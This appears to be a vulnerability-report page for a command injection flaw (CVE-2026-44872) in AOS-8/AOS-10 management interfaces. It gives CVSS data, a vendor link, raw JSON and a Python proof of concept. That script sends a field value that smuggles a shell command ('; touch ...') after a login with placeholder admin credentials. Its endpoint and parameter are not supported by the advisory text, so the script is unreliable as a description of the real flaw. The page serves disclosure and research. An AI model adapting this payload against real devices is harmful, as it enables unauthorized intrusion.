Security Vulnerability Report
CVE-2026-44872 CVSS 7.2 HIGH

CVE-2026-44872

Published: 2026-05-12 20:16:46
Last Modified: 2026-05-12 20:16:46

Description

A command injection vulnerability exists in the web-based management interface of AOS-8 and AOS-10 Operating Systems. Successful exploitation could allow an authenticated remote attacker to place arbitrary files on the underlying filesystem of the affected device.

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

AOS-8
AOS-10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# PoC for CVE-2026-44872: Command Injection in AOS-8/10
# Target: AOS-8 and AOS-10 Web Management Interface
# Requirement: Authenticated High Privileges

target_url = "https://<target-ip>/api/v1/file/upload"
session = requests.Session()

# 1. Login to get authenticated session (High Privilege required)
creds = {"username": "admin", "password": "password"}
session.post("https://<target-ip>/login", data=creds)

# 2. Prepare malicious payload to inject command
# The goal is to write a file to the underlying filesystem
payload = "; touch /tmp/poc_success.txt"

# 3. Send malicious request to vulnerable endpoint
data = {
    "filename": "config.txt",
    "content": payload  # Vulnerable parameter
}
response = session.post(target_url, data=data, verify=False)

if response.status_code == 200:
    print("[+] Payload sent successfully.")
    print("[+] Check if /tmp/poc_success.txt exists on the target.")
else:
    print("[-] Failed to send payload.")

References

https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05048en_us&docLocale=en_US

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44872", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:45.793", "lastModified": "2026-05-12T20:16:45.793", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A command injection vulnerability exists in the web-based management interface of AOS-8 and AOS-10 Operating Systems. Successful exploitation could allow an authenticated remote attacker to place arbitrary files on the underlying filesystem of the affected device."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05048en_us&docLocale=en_US", "source": "[email protected]"}]}}